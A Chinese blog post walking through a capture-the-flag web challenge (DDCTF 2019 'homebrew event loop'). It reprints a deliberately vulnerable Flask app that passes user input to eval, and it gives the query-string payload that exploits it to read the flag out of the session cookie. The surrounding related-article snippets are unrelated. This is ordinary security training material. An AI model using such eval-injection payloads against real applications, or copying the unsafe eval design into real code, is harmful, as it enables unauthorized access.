[DDCTF 2019]homebrew event loop

最新推荐文章于 2021-07-20 23:41:15 发布
最新推荐文章于 2021-07-20 23:41:15 发布
阅读量496 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Youth____/article/details/113064557
版权

首先打开环境
在这里插入图片描述
上面显示了几个链接,依次浏览

第一个点开是python代码
在这里插入图片描述
第二个点开,可以用1point买1个钻石,总共就3个point在这里插入图片描述
第三个是重置,重置了以后会把point返还
在这里插入图片描述
现在最有用的是最上面的python代码

from flask import Flask, session, request, Response
import urllib

app = Flask(__name__)
app.secret_key = '*********************'  # censored
url_prefix = '/d5afe1f66147e857'


def FLAG():
    return '*********************'  # censored


def trigger_event(event):
    session['log'].append(event)
    if len(session['log']) > 5:
        session['log'] = session['log'][-5:]
    if type(event) == type([]):
        request.event_queue += event
    else:
        request.event_queue.append(event)


def get_mid_str(haystack, prefix, postfix=None):
    haystack = haystack[haystack.find(prefix)+len(prefix):]
    if postfix is not None:
        haystack = haystack[:haystack.find(postfix)]
    return haystack


class RollBackException:
    pass


def execute_event_loop():
    valid_event_chars = set(
        'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789:;#')
    resp = None
    while len(request.event_queue) > 0:
        # `event` is something like "action:ACTION;ARGS0#ARGS1#ARGS2......"
        event = request.event_queue[0]
        request.event_queue = request.event_queue[1:]
        if not event.startswith(('action:', 'func:')):
            continue
        for c in event:
            if c not in valid_event_chars:
                break
        else:
            is_action = event[0] == 'a'
            action = get_mid_str(event, ':', ';')
            args = get_mid_str(event, action+';').split('#')
            try:
                event_handler = eval(
                    action + ('_handler' if is_action else '_function'))
                ret_val = event_handler(args)
            except RollBackException:
                if resp is None:
                    resp = ''
                resp += 'ERROR! All transactions have been cancelled. <br />'
                resp += '<a href="./?action:view;index">Go back to index.html</a><br />'
                session['num_items'] = request.prev_session['num_items']
                session['points'] = request.prev_session['points']
                break
            except Exception, e:
                if resp is None:
                    resp = ''
                # resp += str(e) # only for debugging
                continue
            if ret_val is not None:
                if resp is None:
                    resp = ret_val
                else:
                    resp += ret_val
    if resp is None or resp == '':
        resp = ('404 NOT FOUND', 404)
    session.modified = True
    return resp


@app.route(url_prefix+'/')
def entry_point():
    querystring = urllib.unquote(request.query_string)
    request.event_queue = []
    if querystring == '' or (not querystring.startswith('action:')) or len(querystring) > 100:
        querystring = 'action:index;False#False'
    if 'num_items' not in session:
        session['num_items'] = 0
        session['points'] = 3
        session['log'] = []
    request.prev_session = dict(session)
    trigger_event(querystring)
    return execute_event_loop()

# handlers/functions below --------------------------------------


def view_handler(args):
    page = args[0]
    html = ''
    html += '[INFO] you have {} diamonds, {} points now.<br />'.format(
        session['num_items'], session['points'])
    if page == 'index':
        html += '<a href="./?action:index;True%23False">View source code</a><br />'
        html += '<a href="./?action:view;shop">Go to e-shop</a><br />'
        html += '<a href="./?action:view;reset">Reset</a><br />'
    elif page == 'shop':
        html += '<a href="./?action:buy;1">Buy a diamond (1 point)</a><br />'
    elif page == 'reset':
        del session['num_items']
        html += 'Session reset.<br />'
    html += '<a href="./?action:view;index">Go back to index.html</a><br />'
    return html


def index_handler(args):
    bool_show_source = str(args[0])
    bool_download_source = str(args[1])
    if bool_show_source == 'True':

        source = open('eventLoop.py', 'r')
        html = ''
        if bool_download_source != 'True':
            html += '<a href="./?action:index;True%23True">Download this .py file</a><br />'
            html += '<a href="./?action:view;index">Go back to index.html</a><br />'

        for line in source:
            if bool_download_source != 'True':
                html += line.replace('&', '&amp;').replace('\t', '&nbsp;'*4).replace(
                    ' ', '&nbsp;').replace('<', '&lt;').replace('>', '&gt;').replace('\n', '<br />')
            else:
                html += line
        source.close()

        if bool_download_source == 'True':
            headers = {}
            headers['Content-Type'] = 'text/plain'
            headers['Content-Disposition'] = 'attachment; filename=serve.py'
            return Response(html, headers=headers)
        else:
            return html
    else:
        trigger_event('action:view;index')


def buy_handler(args):
    num_items = int(args[0])
    if num_items <= 0:
        return 'invalid number({}) of diamonds to buy<br />'.format(args[0])
    session['num_items'] += num_items
    trigger_event(['func:consume_point;{}'.format(
        num_items), 'action:view;index'])


def consume_point_function(args):
    point_to_consume = int(args[0])
    if session['points'] < point_to_consume:
        raise RollBackException()
    session['points'] -= point_to_consume


def show_flag_function(args):
    flag = args[0]
    # return flag # GOTCHA! We noticed that here is a backdoor planted by a hacker which will print the flag, so we disabled it.
    return 'You naughty boy! ;) <br />'


def get_flag_handler(args):
    if session['num_items'] >= 5:
        # show_flag_function has been disabled, no worries
        trigger_event('func:show_flag;' + FLAG())
    trigger_event('action:view;index')


if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0')

进行代码审计

看到有两个命名与flag相关的函数

我们先看get_flag_handler(),要想flag就要满足session[‘num_items’] >= 5

在这里面提到了trigger_event(),来看一下

def trigger_event(event):
    session['log'].append(event)
    if len(session['log']) > 5:
        session['log'] = session['log'][-5:]
    if type(event) == type([]):
        request.event_queue += event
    else:
        request.event_queue.append(event)

这个函数是往session里写日志,会记录下各个函数的调用,那么自然会把trigger_event(‘func:show_flag;’ + FLAG())存在放在session[‘log’]中,那么flag就会在session中

现在要想想怎么满足session[‘num_items’] >= 5

def buy_handler(args):
    num_items = int(args[0])
    if num_items <= 0:
        return 'invalid number({}) of diamonds to buy<br />'.format(args[0])
    session['num_items'] += num_items
    trigger_event(['func:consume_point;{}'.format(
        num_items), 'action:view;index'])

def consume_point_function(args):
    point_to_consume = int(args[0])
    if session['points'] < point_to_consume:
        raise RollBackException()
    session['points'] -= point_to_consume

buy_handler()会先加上num_items,然后再执行consume_point_function()函数,在consume_point_function()函数中,如果发现points不够会回滚,就是把num_items再减掉

那我只有3个point,买不了5个num_items怎么办呢

那我就要在num_items被减掉之前执行get_flag_handler()不就行了

ok,现在来看

def execute_event_loop():
    valid_event_chars = set(
        'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789:;#')
    resp = None
    while len(request.event_queue) > 0:
        # `event` is something like "action:ACTION;ARGS0#ARGS1#ARGS2......"
        event = request.event_queue[0]
        request.event_queue = request.event_queue[1:]
        if not event.startswith(('action:', 'func:')):
            continue
        for c in event:
            if c not in valid_event_chars:
                break
        else:
            is_action = event[0] == 'a'
            action = get_mid_str(event, ':', ';')
            args = get_mid_str(event, action+';').split('#')
            try:
                event_handler = eval(
                    action + ('_handler' if is_action else '_function'))
                ret_val = event_handler(args)
            except RollBackException:
                if resp is None:
                    resp = ''
                resp += 'ERROR! All transactions have been cancelled. <br />'
                resp += '<a href="./?action:view;index">Go back to index.html</a><br />'
                session['num_items'] = request.prev_session['num_items']
                session['points'] = request.prev_session['points']
                break
            except Exception, e:
                if resp is None:
                    resp = ''
                # resp += str(e) # only for debugging
                continue
            if ret_val is not None:
                if resp is None:
                    resp = ret_val
                else:
                    resp += ret_val
    if resp is None or resp == '':
        resp = ('404 NOT FOUND', 404)
    session.modified = True
    return resp

可以看到里面有一个可控eval函数,利用eval函数可以导致任意命令执行

若让eval()去执行trigger_event(),并且在后面跟着buy和get_flag,那么buy_handler()和get_flag_handler()便先后进入队列,那么这时consume_point_function()就会在get_flag_handler()之后

payload:?action:trigger_event%23;action:buy;5%23action:get_flag;

在这里插入图片描述
得到cookie:

Set-Cookie: session=.eJyNjt9LhEAcxP-V2Od70DUTBV9ClKRWMrvd_UaEPy7Pvd09QT3Tw_89CQrieuhtYGY-M2ckjzXyXs7oqkAe4pQYOXWHRKdTTisNLH4HBrLQjyLBoagieSpE21Ts4JAnsudW2hb4-gbw1mAYOk5LBy2bC5yKzV3Wmat14VSyCl1VRKFORt9Hy-tPG_R24HMrCmzPFTUls25PObWNZH72_yBpaIGVzpo4AKu_SL9Bcx651vdLUB97sLqRz7UJNFZkMkaC7-b7LJUkqPskkAIaU5GM20lAxENWTpAR93_DSA_qrel3qkOesUHtsdH9Kq3lE6ZAdjI.YAwzsw.b-YFccwPSLfcxOXj9EvSyxGjlx0; HttpOnly; Path=/

用flask-session-cookie-manager-master解密session
在这里插入图片描述

b'{"log":[{" b":"YWN0aW9uOnRyaWdnZXJfZXZlbnQjO2FjdGlvbjpidXk7NSNhY3Rpb246Z2V0X2ZsYWc7"},[{" b":"YWN0aW9uOmJ1eTs1"},{" b":"YWN0aW9uOmdldF9mbGFnOw=="}],[{" b":"ZnVuYzpjb25zdW1lX3BvaW50OzU="},{" b":"YWN0aW9uOnZpZXc7aW5kZXg="}],{" b":"ZnVuYzpzaG93X2ZsYWc7ZmxhZ3swYzg1ZWJmNy0wN2IzLTRlNDgtODljZi1mNTY5ODNjMTcyZTN9"},{" b":"YWN0aW9uOnZpZXc7aW5kZXg="}],"num_items":0,"points":3}'

把ZnVuYzpzaG93X2ZsYWc7ZmxhZ3swYzg1ZWJmNy0wN2IzLTRlNDgtODljZi1mNTY5ODNjMTcyZTN9进行base64解码后

func:show_flag;flag{0c85ebf7-07b3-4e48-89cf-f56983c172e3}

成功获得flag
flag{0c85ebf7-07b3-4e48-89cf-f56983c172e3}

Youth____
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DDCTF2019-Web-homebrew event loop(python flask代码审计)
Sea_Sand息禅
06-15 1000
进入网站,有以下几个功能: 1、查看源码 2、商店购买diamonds 3、重置Session 4、回到主页 刚开始是有3 points ,一个point可以买一个diamond,下面进行源码审计: from flask import Flask, session, request, Response import urllib app = Flask(__name__) app.secret_...
Homebrew-4.1.4
01-04
macos版Homebrew-4.1.4
BUUCTF--[DDCTF 2019]homebrew event loop
qq_46263951的博客
07-20 353
先来补充知识点: session in python append in python _str in python flask的常用接收参数的方法 python路由 首先了解一下各个页面的作用: View source code 查看网页源代码 Go to e-shop 一个积分可以买一个钻石 Reset 重置 Go back to index.html 返...
buuctf-web-homebrew event loop
weixin_43345082的博客
08-26 382
源码太多就不贴了 四个按钮 一个是看源码 一个是进商店买 一个是重置 一个是返回index 然后url的格式都是这样的 ?action:index;True%23False ?action:view;shop ?action:view;reset ?action:view;index 分析一下流程 首先登陆的时候 http://url_prefix/d5afe1f66147e857/ 会先进入这...
Homebrew 国内安装脚本.zip
05-02
Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内安装脚本 Homebrew 国内...
macbook安装homebrew
04-19
macbook安装homebrew,使用国内的源,官方提供的源如果安装失败,可以尝试一下,自己整理的
homebrew-aliases:Homebrew的别名
02-04
安装brew tap homebrew/aliases用法这与alias命令类似: # add aliases$ brew alias up='update'$ brew alias i='install'# print all aliases$ brew alias# print one alias$ brew alias up# use your aliases like...
Mac homebrew安装的软件的位置
幻想之渔
11-13 3996
废话不多说  这个目录下面: /usr/local/Cellar/
DDCTF2019-WRITEUP
郁离歌丶的博客
05-04 2880
WEB 滴~ 进去之后就看到url一串base64,解两次是flag.jpg,明显文件读取,读一下index.php,发现居然给了博客。这是恶意引流吧,服了。在出题人博客里面找到.practice.txt.swp,然鹅.practice.txt.swp404了,而practice.txt.swp却能访问???佛了。 内容是f1ag!ddctf.php,然后在index.php的源码里面发现他将co...
悲剧!Homebrew 的作者被 Google 拒啦,因为他不会翻转二叉树(转自V2EX)
qq_28033915的博客
06-11 2360
Homebrew 的作者被 Google 拒啦,因为他不会翻转二叉树,然后作者在twitter上开骂啦,然后很多公司开始抢人了。 你来挑战一下翻转二叉树吧 http://www.nowcoder.com/books/coding-interviews/564f4c26aa584921bc75623e48ca3011 非递归版本的答案如下: http://www.nowcod
Python安全编码与代码审计
xzb0606xzb的博客
10-03 792
 1 前言 现在一般的web开发框架安全已经做的挺好的了,比如大家常用的django,但是一些不规范的开发方式还是会导致一些常用的安全问题,下面就针对这些常用问题做一些总结。代码审计准备部分见《php代码审计》,这篇文档主要讲述各种常用错误场景,基本上都是咱们自己的开发人员犯的错误,敏感信息已经去除。 2 XSS 未对输入和输出做过滤,场景: def xss_test(reque
2019DDCTF 部分Writeup
观樂。的博客
04-19 1939
2019DDCTF 部分Writeup 太菜了,就只做了四道题,而且其中不乏大佬们的提示,这里就记录下做了的题… Web 滴~ 题目地址:http://117.51.150.246 打开后题目跳转到这个地址:http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 界面显示如下图: 然后看传入的jpg的值是bas...
ChatGPT原理1-3
06-20
ChatGPT原理1-3
aiohttp-3.4.0b2.tar.gz
最新发布
06-20
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
小程序版通过CNN训练识别印刷体数字和字母-不含数据集图片-含逐行注释和说明文档.zip
06-20
本代码是基于python pytorch环境安装的。 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集。 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地。训练完成之后会有log日志保存本地,里面记录了每个epoch的验证集损失值和准确率。 运行03flask_服务端.py就可以生成与小程序交互的url了 然后需要我们运行微信开发者工具,如果之前没有下载过,则需要在电脑网页上,搜微信开发者工具进行下载。 导入我们的小
AI+智慧校园建设方案PPT(100页).pptx
06-20
智慧校园大数据信息化AIOT平台建设整体解决方案是一个综合性的校园智能化升级计划,旨在通过应用物联网、大数据、人工智能等高新技术,打造一个安全、便捷、绿色的校园环境。该方案遵循国家教育信息化2.0规划和相关标准,强调技术在教育领域的深度应用。 方案的核心内容包括全场景的智能互联、物信融合、AI赋能创新应用,以及校园营运指挥中心的建设。它涵盖了智慧管理、智慧服务、智慧教学等多个方面,通过SAAS、PAAS、DAAS、IAAS等多层次的系统架构,实现从数据存储、管理到智能分析和应用的全面覆盖。 智慧应用聚焦于校园特色场景,如教室、宿舍、图书馆和食堂,通过AI视频智能分析技术,提供便捷服务。方案还包括智能安防、智慧消防、能耗监管等,以实现校园的智能化管理。例如,人脸门禁系统提供无感通行,提高安全性和便捷性;车辆管理系统通过轨迹分析和布控,优化交通秩序。 此外,方案还强调了智能照明、智能水控和电控等节能环保措施,以及通过智能语音分析和录播方案提升教学质量。智慧宿舍通过人脸宿管和智能节电,提高宿舍管理效率。整体上,该方案通过技术集成和创新,推动校园向智能化、信息化转型,为师生创造更安全、便捷、环保的学习和生活环境。
Homebrew安装
04-22
Homebrew是一款在Mac操作系统上使用的包管理器,它可以帮助用户方便地安装、升级和管理各种软件包。下面是Homebrew的安装步骤: 1. 打开终端:在Mac上,你可以通过在“应用程序”文件夹中找到“实用工具”文件夹,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值